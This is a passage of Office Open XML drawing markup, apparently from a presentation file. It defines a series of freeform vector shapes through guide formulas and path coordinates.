                      <a:pt x="23" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="12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11" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="2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5" name="Freeform 253">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAA0CF55-FBB3-484C-AFFA-99DDE9F17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171"/>
                <a:ext cx="69" cy="69"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 22 w 69"/>
                  <a:gd name="T1" fmla="*/ 2 h 69"/>
                  <a:gd name="T2" fmla="*/ 15 w 69"/>
                  <a:gd name="T3" fmla="*/ 6 h 69"/>
                  <a:gd name="T4" fmla="*/ 13 w 69"/>
                  <a:gd name="T5" fmla="*/ 10 h 69"/>
                  <a:gd name="T6" fmla="*/ 9 w 69"/>
                  <a:gd name="T7" fmla="*/ 16 h 69"/>
                  <a:gd name="T8" fmla="*/ 8 w 69"/>
                  <a:gd name="T9" fmla="*/ 18 h 69"/>
                  <a:gd name="T10" fmla="*/ 8 w 69"/>
                  <a:gd name="T11" fmla="*/ 21 h 69"/>
                  <a:gd name="T12" fmla="*/ 9 w 69"/>
                  <a:gd name="T13" fmla="*/ 25 h 69"/>
                  <a:gd name="T14" fmla="*/ 6 w 69"/>
                  <a:gd name="T15" fmla="*/ 28 h 69"/>
                  <a:gd name="T16" fmla="*/ 2 w 69"/>
                  <a:gd name="T17" fmla="*/ 35 h 69"/>
                  <a:gd name="T18" fmla="*/ 0 w 69"/>
                  <a:gd name="T19" fmla="*/ 39 h 69"/>
                  <a:gd name="T20" fmla="*/ 0 w 69"/>
                  <a:gd name="T21" fmla="*/ 40 h 69"/>
                  <a:gd name="T22" fmla="*/ 0 w 69"/>
                  <a:gd name="T23" fmla="*/ 41 h 69"/>
                  <a:gd name="T24" fmla="*/ 2 w 69"/>
                  <a:gd name="T25" fmla="*/ 41 h 69"/>
                  <a:gd name="T26" fmla="*/ 5 w 69"/>
                  <a:gd name="T27" fmla="*/ 42 h 69"/>
                  <a:gd name="T28" fmla="*/ 6 w 69"/>
                  <a:gd name="T29" fmla="*/ 42 h 69"/>
                  <a:gd name="T30" fmla="*/ 6 w 69"/>
                  <a:gd name="T31" fmla="*/ 45 h 69"/>
                  <a:gd name="T32" fmla="*/ 5 w 69"/>
                  <a:gd name="T33" fmla="*/ 49 h 69"/>
                  <a:gd name="T34" fmla="*/ 7 w 69"/>
                  <a:gd name="T35" fmla="*/ 51 h 69"/>
                  <a:gd name="T36" fmla="*/ 6 w 69"/>
                  <a:gd name="T37" fmla="*/ 53 h 69"/>
                  <a:gd name="T38" fmla="*/ 8 w 69"/>
                  <a:gd name="T39" fmla="*/ 54 h 69"/>
                  <a:gd name="T40" fmla="*/ 9 w 69"/>
                  <a:gd name="T41" fmla="*/ 60 h 69"/>
                  <a:gd name="T42" fmla="*/ 11 w 69"/>
                  <a:gd name="T43" fmla="*/ 61 h 69"/>
                  <a:gd name="T44" fmla="*/ 15 w 69"/>
                  <a:gd name="T45" fmla="*/ 61 h 69"/>
                  <a:gd name="T46" fmla="*/ 19 w 69"/>
                  <a:gd name="T47" fmla="*/ 60 h 69"/>
                  <a:gd name="T48" fmla="*/ 24 w 69"/>
                  <a:gd name="T49" fmla="*/ 60 h 69"/>
                  <a:gd name="T50" fmla="*/ 24 w 69"/>
                  <a:gd name="T51" fmla="*/ 68 h 69"/>
                  <a:gd name="T52" fmla="*/ 60 w 69"/>
                  <a:gd name="T53" fmla="*/ 57 h 69"/>
                  <a:gd name="T54" fmla="*/ 57 w 69"/>
                  <a:gd name="T55" fmla="*/ 51 h 69"/>
                  <a:gd name="T56" fmla="*/ 58 w 69"/>
                  <a:gd name="T57" fmla="*/ 46 h 69"/>
                  <a:gd name="T58" fmla="*/ 68 w 69"/>
                  <a:gd name="T59" fmla="*/ 37 h 69"/>
                  <a:gd name="T60" fmla="*/ 68 w 69"/>
                  <a:gd name="T61" fmla="*/ 13 h 69"/>
                  <a:gd name="T62" fmla="*/ 61 w 69"/>
                  <a:gd name="T63" fmla="*/ 6 h 69"/>
                  <a:gd name="T64" fmla="*/ 53 w 69"/>
                  <a:gd name="T65" fmla="*/ 2 h 69"/>
                  <a:gd name="T66" fmla="*/ 44 w 69"/>
                  <a:gd name="T67" fmla="*/ 0 h 69"/>
                  <a:gd name="T68" fmla="*/ 32 w 69"/>
                  <a:gd name="T69" fmla="*/ 1 h 69"/>
                  <a:gd name="T70" fmla="*/ 22 w 69"/>
                  <a:gd name="T71" fmla="*/ 2 h 6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9"/>
                  <a:gd name="T109" fmla="*/ 0 h 69"/>
                  <a:gd name="T110" fmla="*/ 69 w 69"/>
                  <a:gd name="T111" fmla="*/ 69 h 6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9" h="69">
                    <a:moveTo>
                      <a:pt x="22" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="15" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="35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0" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="60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0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="2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6" name="Freeform 254">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3095133C-AA19-4172-A700-D11490D7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211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1 w 17"/>
                  <a:gd name="T3" fmla="*/ 0 h 1"/>
                  <a:gd name="T4" fmla="*/ 16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1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7" name="Freeform 255">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B489906-29D5-473F-9FFF-288F8047E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220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0 h 17"/>
                  <a:gd name="T4" fmla="*/ 0 w 17"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 16 w 17"/>
                  <a:gd name="T7" fmla="*/ 1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10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="1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8" name="Freeform 256">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CB16102-0551-4775-A5CC-9B45BCFAB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4" y="2198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2 w 17"/>
                  <a:gd name="T3" fmla="*/ 16 h 17"/>
                  <a:gd name="T4" fmla="*/ 4 w 17"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 6 w 17"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 10 w 17"/>
                  <a:gd name="T9" fmla="*/ 16 h 17"/>
                  <a:gd name="T10" fmla="*/ 16 w 17"/>
                  <a:gd name="T11" fmla="*/ 16 h 17"/>
                  <a:gd name="T12" fmla="*/ 10 w 17"/>
                  <a:gd name="T13" fmla="*/ 0 h 17"/>
                  <a:gd name="T14" fmla="*/ 0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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2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39" name="Freeform 257">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34C58DAF-EB87-4D38-B3C3-4B94D6F96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2191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 w 17"/>
                  <a:gd name="T3" fmla="*/ 16 h 17"/>
                  <a:gd name="T4" fmla="*/ 2 w 17"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 4 w 17"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 8 w 17"/>
                  <a:gd name="T9" fmla="*/ 8 h 17"/>
                  <a:gd name="T10" fmla="*/ 12 w 17"/>
                  <a:gd name="T11" fmla="*/ 8 h 17"/>
                  <a:gd name="T12" fmla="*/ 16 w 17"/>
                  <a:gd name="T13" fmla="*/ 8 h 17"/>
                  <a:gd name="T14" fmla="*/ 10 w 17"/>
                  <a:gd name="T15" fmla="*/ 8 h 17"/>
                  <a:gd name="T16" fmla="*/ 8 w 17"/>
                  <a:gd name="T17" fmla="*/ 0 h 17"/>
                  <a:gd name="T18" fmla="*/ 7 w 17"/>
                  <a:gd name="T19" fmla="*/ 8 h 17"/>
                  <a:gd name="T20" fmla="*/ 7 w 17"/>
                  <a:gd name="T21" fmla="*/ 0 h 17"/>
                  <a:gd name="T22" fmla="*/ 4 w 17"/>
                  <a:gd name="T23" fmla="*/ 8 h 17"/>
                  <a:gd name="T24" fmla="*/ 2 w 17"/>
                  <a:gd name="T25" fmla="*/ 8 h 17"/>
                  <a:gd name="T26" fmla="*/ 0 w 17"/>
                  <a:gd name="T27" fmla="*/ 8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7"/>
                  <a:gd name="T44" fmla="*/ 17 w 17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7">
                    <a:moveTo>
                      <a:pt x="0" y="8"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1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7" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7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0" name="Freeform 258">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F27BBAEB-3565-4B09-8D2E-643A6355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0" y="2197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4 w 17"/>
                  <a:gd name="T3" fmla="*/ 1 h 17"/>
                  <a:gd name="T4" fmla="*/ 9 w 17"/>
                  <a:gd name="T5" fmla="*/ 2 h 17"/>
                  <a:gd name="T6" fmla="*/ 13 w 17"/>
                  <a:gd name="T7" fmla="*/ 4 h 17"/>
                  <a:gd name="T8" fmla="*/ 13 w 17"/>
                  <a:gd name="T9" fmla="*/ 8 h 17"/>
                  <a:gd name="T10" fmla="*/ 13 w 17"/>
                  <a:gd name="T11" fmla="*/ 9 h 17"/>
                  <a:gd name="T12" fmla="*/ 11 w 17"/>
                  <a:gd name="T13" fmla="*/ 11 h 17"/>
                  <a:gd name="T14" fmla="*/ 8 w 17"/>
                  <a:gd name="T15" fmla="*/ 8 h 17"/>
                  <a:gd name="T16" fmla="*/ 6 w 17"/>
                  <a:gd name="T17" fmla="*/ 7 h 17"/>
                  <a:gd name="T18" fmla="*/ 0 w 17"/>
                  <a:gd name="T19" fmla="*/ 6 h 17"/>
                  <a:gd name="T20" fmla="*/ 4 w 17"/>
                  <a:gd name="T21" fmla="*/ 8 h 17"/>
                  <a:gd name="T22" fmla="*/ 9 w 17"/>
                  <a:gd name="T23" fmla="*/ 10 h 17"/>
                  <a:gd name="T24" fmla="*/ 9 w 17"/>
                  <a:gd name="T25" fmla="*/ 12 h 17"/>
                  <a:gd name="T26" fmla="*/ 8 w 17"/>
                  <a:gd name="T27" fmla="*/ 16 h 17"/>
                  <a:gd name="T28" fmla="*/ 6 w 17"/>
                  <a:gd name="T29" fmla="*/ 16 h 17"/>
                  <a:gd name="T30" fmla="*/ 11 w 17"/>
                  <a:gd name="T31" fmla="*/ 13 h 17"/>
                  <a:gd name="T32" fmla="*/ 16 w 17"/>
                  <a:gd name="T33" fmla="*/ 10 h 17"/>
                  <a:gd name="T34" fmla="*/ 16 w 17"/>
                  <a:gd name="T35" fmla="*/ 7 h 17"/>
                  <a:gd name="T36" fmla="*/ 16 w 17"/>
                  <a:gd name="T37" fmla="*/ 3 h 17"/>
                  <a:gd name="T38" fmla="*/ 11 w 17"/>
                  <a:gd name="T39" fmla="*/ 1 h 17"/>
                  <a:gd name="T40" fmla="*/ 6 w 17"/>
                  <a:gd name="T41" fmla="*/ 0 h 17"/>
                  <a:gd name="T42" fmla="*/ 2 w 17"/>
                  <a:gd name="T43" fmla="*/ 0 h 17"/>
                  <a:gd name="T44" fmla="*/ 0 w 17"/>
                  <a:gd name="T45" fmla="*/ 3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"/>
                  <a:gd name="T70" fmla="*/ 0 h 17"/>
                  <a:gd name="T71" fmla="*/ 17 w 17"/>
                  <a:gd name="T72" fmla="*/ 17 h 1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" h="17">
                    <a:moveTo>
                      <a:pt x="0" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="7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11" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16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1" name="Freeform 259">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44200E21-D6E1-4E59-9831-15606B11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2195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3 w 17"/>
                  <a:gd name="T3" fmla="*/ 1 h 17"/>
                  <a:gd name="T4" fmla="*/ 6 w 17"/>
                  <a:gd name="T5" fmla="*/ 0 h 17"/>
                  <a:gd name="T6" fmla="*/ 11 w 17"/>
                  <a:gd name="T7" fmla="*/ 1 h 17"/>
                  <a:gd name="T8" fmla="*/ 13 w 17"/>
                  <a:gd name="T9" fmla="*/ 3 h 17"/>
                  <a:gd name="T10" fmla="*/ 13 w 17"/>
                  <a:gd name="T11" fmla="*/ 5 h 17"/>
                  <a:gd name="T12" fmla="*/ 13 w 17"/>
                  <a:gd name="T13" fmla="*/ 6 h 17"/>
                  <a:gd name="T14" fmla="*/ 13 w 17"/>
                  <a:gd name="T15" fmla="*/ 8 h 17"/>
                  <a:gd name="T16" fmla="*/ 11 w 17"/>
                  <a:gd name="T17" fmla="*/ 11 h 17"/>
                  <a:gd name="T18" fmla="*/ 8 w 17"/>
                  <a:gd name="T19" fmla="*/ 13 h 17"/>
                  <a:gd name="T20" fmla="*/ 4 w 17"/>
                  <a:gd name="T21" fmla="*/ 13 h 17"/>
                  <a:gd name="T22" fmla="*/ 4 w 17"/>
                  <a:gd name="T23" fmla="*/ 14 h 17"/>
                  <a:gd name="T24" fmla="*/ 6 w 17"/>
                  <a:gd name="T25" fmla="*/ 16 h 17"/>
                  <a:gd name="T26" fmla="*/ 8 w 17"/>
                  <a:gd name="T27" fmla="*/ 16 h 17"/>
                  <a:gd name="T28" fmla="*/ 11 w 17"/>
                  <a:gd name="T29" fmla="*/ 14 h 17"/>
                  <a:gd name="T30" fmla="*/ 13 w 17"/>
                  <a:gd name="T31" fmla="*/ 11 h 17"/>
                  <a:gd name="T32" fmla="*/ 16 w 17"/>
                  <a:gd name="T33" fmla="*/ 8 h 17"/>
                  <a:gd name="T34" fmla="*/ 16 w 17"/>
                  <a:gd name="T35" fmla="*/ 6 h 17"/>
                  <a:gd name="T36" fmla="*/ 16 w 17"/>
                  <a:gd name="T37" fmla="*/ 4 h 17"/>
                  <a:gd name="T38" fmla="*/ 13 w 17"/>
                  <a:gd name="T39" fmla="*/ 2 h 17"/>
                  <a:gd name="T40" fmla="*/ 11 w 17"/>
                  <a:gd name="T41" fmla="*/ 0 h 17"/>
                  <a:gd name="T42" fmla="*/ 8 w 17"/>
                  <a:gd name="T43" fmla="*/ 0 h 17"/>
                  <a:gd name="T44" fmla="*/ 3 w 17"/>
                  <a:gd name="T45" fmla="*/ 0 h 17"/>
                  <a:gd name="T46" fmla="*/ 0 w 17"/>
                  <a:gd name="T47" fmla="*/ 1 h 17"/>
                  <a:gd name="T48" fmla="*/ 0 w 17"/>
                  <a:gd name="T49" fmla="*/ 3 h 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"/>
                  <a:gd name="T76" fmla="*/ 0 h 17"/>
                  <a:gd name="T77" fmla="*/ 17 w 17"/>
                  <a:gd name="T78" fmla="*/ 17 h 1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" h="17">
                    <a:moveTo>
                      <a:pt x="0" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="1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3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3" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="11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1" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="11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2" name="Freeform 260">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E17CC54-23E9-4CA0-83AD-5F007298D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" y="2213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3 w 17"/>
                  <a:gd name="T3" fmla="*/ 3 h 17"/>
                  <a:gd name="T4" fmla="*/ 11 w 17"/>
                  <a:gd name="T5" fmla="*/ 5 h 17"/>
                  <a:gd name="T6" fmla="*/ 5 w 17"/>
                  <a:gd name="T7" fmla="*/ 10 h 17"/>
                  <a:gd name="T8" fmla="*/ 1 w 17"/>
                  <a:gd name="T9" fmla="*/ 13 h 17"/>
                  <a:gd name="T10" fmla="*/ 0 w 17"/>
                  <a:gd name="T11" fmla="*/ 16 h 17"/>
                  <a:gd name="T12" fmla="*/ 4 w 17"/>
                  <a:gd name="T13" fmla="*/ 12 h 17"/>
                  <a:gd name="T14" fmla="*/ 9 w 17"/>
                  <a:gd name="T15" fmla="*/ 10 h 17"/>
                  <a:gd name="T16" fmla="*/ 13 w 17"/>
                  <a:gd name="T17" fmla="*/ 4 h 17"/>
                  <a:gd name="T18" fmla="*/ 16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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5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12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13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3" name="Freeform 261">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E515BB22-09B7-45C5-A2AF-2B684B9F0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4" y="2163"/>
                <a:ext cx="61" cy="55"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 61"/>
                  <a:gd name="T1" fmla="*/ 16 h 55"/>
                  <a:gd name="T2" fmla="*/ 14 w 61"/>
                  <a:gd name="T3" fmla="*/ 14 h 55"/>
                  <a:gd name="T4" fmla="*/ 19 w 61"/>
                  <a:gd name="T5" fmla="*/ 15 h 55"/>
                  <a:gd name="T6" fmla="*/ 23 w 61"/>
                  <a:gd name="T7" fmla="*/ 18 h 55"/>
                  <a:gd name="T8" fmla="*/ 21 w 61"/>
                  <a:gd name="T9" fmla="*/ 23 h 55"/>
                  <a:gd name="T10" fmla="*/ 18 w 61"/>
                  <a:gd name="T11" fmla="*/ 25 h 55"/>
                  <a:gd name="T12" fmla="*/ 18 w 61"/>
                  <a:gd name="T13" fmla="*/ 29 h 55"/>
                  <a:gd name="T14" fmla="*/ 18 w 61"/>
                  <a:gd name="T15" fmla="*/ 32 h 55"/>
                  <a:gd name="T16" fmla="*/ 18 w 61"/>
                  <a:gd name="T17" fmla="*/ 37 h 55"/>
                  <a:gd name="T18" fmla="*/ 21 w 61"/>
                  <a:gd name="T19" fmla="*/ 37 h 55"/>
                  <a:gd name="T20" fmla="*/ 22 w 61"/>
                  <a:gd name="T21" fmla="*/ 32 h 55"/>
                  <a:gd name="T22" fmla="*/ 24 w 61"/>
                  <a:gd name="T23" fmla="*/ 29 h 55"/>
                  <a:gd name="T24" fmla="*/ 29 w 61"/>
                  <a:gd name="T25" fmla="*/ 29 h 55"/>
                  <a:gd name="T26" fmla="*/ 33 w 61"/>
                  <a:gd name="T27" fmla="*/ 30 h 55"/>
                  <a:gd name="T28" fmla="*/ 35 w 61"/>
                  <a:gd name="T29" fmla="*/ 34 h 55"/>
                  <a:gd name="T30" fmla="*/ 36 w 61"/>
                  <a:gd name="T31" fmla="*/ 38 h 55"/>
                  <a:gd name="T32" fmla="*/ 35 w 61"/>
                  <a:gd name="T33" fmla="*/ 41 h 55"/>
                  <a:gd name="T34" fmla="*/ 35 w 61"/>
                  <a:gd name="T35" fmla="*/ 43 h 55"/>
                  <a:gd name="T36" fmla="*/ 35 w 61"/>
                  <a:gd name="T37" fmla="*/ 47 h 55"/>
                  <a:gd name="T38" fmla="*/ 38 w 61"/>
                  <a:gd name="T39" fmla="*/ 49 h 55"/>
                  <a:gd name="T40" fmla="*/ 40 w 61"/>
                  <a:gd name="T41" fmla="*/ 51 h 55"/>
                  <a:gd name="T42" fmla="*/ 45 w 61"/>
                  <a:gd name="T43" fmla="*/ 54 h 55"/>
                  <a:gd name="T44" fmla="*/ 55 w 61"/>
                  <a:gd name="T45" fmla="*/ 45 h 55"/>
                  <a:gd name="T46" fmla="*/ 58 w 61"/>
                  <a:gd name="T47" fmla="*/ 38 h 55"/>
                  <a:gd name="T48" fmla="*/ 60 w 61"/>
                  <a:gd name="T49" fmla="*/ 26 h 55"/>
                  <a:gd name="T50" fmla="*/ 60 w 61"/>
                  <a:gd name="T51" fmla="*/ 16 h 55"/>
                  <a:gd name="T52" fmla="*/ 59 w 61"/>
                  <a:gd name="T53" fmla="*/ 9 h 55"/>
                  <a:gd name="T54" fmla="*/ 55 w 61"/>
                  <a:gd name="T55" fmla="*/ 5 h 55"/>
                  <a:gd name="T56" fmla="*/ 50 w 61"/>
                  <a:gd name="T57" fmla="*/ 1 h 55"/>
                  <a:gd name="T58" fmla="*/ 44 w 61"/>
                  <a:gd name="T59" fmla="*/ 0 h 55"/>
                  <a:gd name="T60" fmla="*/ 34 w 61"/>
                  <a:gd name="T61" fmla="*/ 0 h 55"/>
                  <a:gd name="T62" fmla="*/ 23 w 61"/>
                  <a:gd name="T63" fmla="*/ 0 h 55"/>
                  <a:gd name="T64" fmla="*/ 11 w 61"/>
                  <a:gd name="T65" fmla="*/ 2 h 55"/>
                  <a:gd name="T66" fmla="*/ 5 w 61"/>
                  <a:gd name="T67" fmla="*/ 5 h 55"/>
                  <a:gd name="T68" fmla="*/ 3 w 61"/>
                  <a:gd name="T69" fmla="*/ 7 h 55"/>
                  <a:gd name="T70" fmla="*/ 0 w 61"/>
                  <a:gd name="T71" fmla="*/ 11 h 55"/>
                  <a:gd name="T72" fmla="*/ 0 w 61"/>
                  <a:gd name="T73" fmla="*/ 13 h 55"/>
                  <a:gd name="T74" fmla="*/ 5 w 61"/>
                  <a:gd name="T75" fmla="*/ 16 h 5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1"/>
                  <a:gd name="T115" fmla="*/ 0 h 55"/>
                  <a:gd name="T116" fmla="*/ 61 w 61"/>
                  <a:gd name="T117" fmla="*/ 55 h 5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1" h="55">
                    <a:moveTo>
                      <a:pt x="5" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="29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5" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="1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3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="2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60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4" name="Freeform 262">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D2362C4-DFC5-438E-A70A-6675ED966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63"/>
                <a:ext cx="59" cy="52"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 59"/>
                  <a:gd name="T1" fmla="*/ 7 h 52"/>
                  <a:gd name="T2" fmla="*/ 1 w 59"/>
                  <a:gd name="T3" fmla="*/ 12 h 52"/>
                  <a:gd name="T4" fmla="*/ 14 w 59"/>
                  <a:gd name="T5" fmla="*/ 13 h 52"/>
                  <a:gd name="T6" fmla="*/ 26 w 59"/>
                  <a:gd name="T7" fmla="*/ 10 h 52"/>
                  <a:gd name="T8" fmla="*/ 20 w 59"/>
                  <a:gd name="T9" fmla="*/ 11 h 52"/>
                  <a:gd name="T10" fmla="*/ 20 w 59"/>
                  <a:gd name="T11" fmla="*/ 15 h 52"/>
                  <a:gd name="T12" fmla="*/ 29 w 59"/>
                  <a:gd name="T13" fmla="*/ 12 h 52"/>
                  <a:gd name="T14" fmla="*/ 24 w 59"/>
                  <a:gd name="T15" fmla="*/ 15 h 52"/>
                  <a:gd name="T16" fmla="*/ 26 w 59"/>
                  <a:gd name="T17" fmla="*/ 16 h 52"/>
                  <a:gd name="T18" fmla="*/ 22 w 59"/>
                  <a:gd name="T19" fmla="*/ 18 h 52"/>
                  <a:gd name="T20" fmla="*/ 24 w 59"/>
                  <a:gd name="T21" fmla="*/ 20 h 52"/>
                  <a:gd name="T22" fmla="*/ 24 w 59"/>
                  <a:gd name="T23" fmla="*/ 22 h 52"/>
                  <a:gd name="T24" fmla="*/ 18 w 59"/>
                  <a:gd name="T25" fmla="*/ 26 h 52"/>
                  <a:gd name="T26" fmla="*/ 28 w 59"/>
                  <a:gd name="T27" fmla="*/ 24 h 52"/>
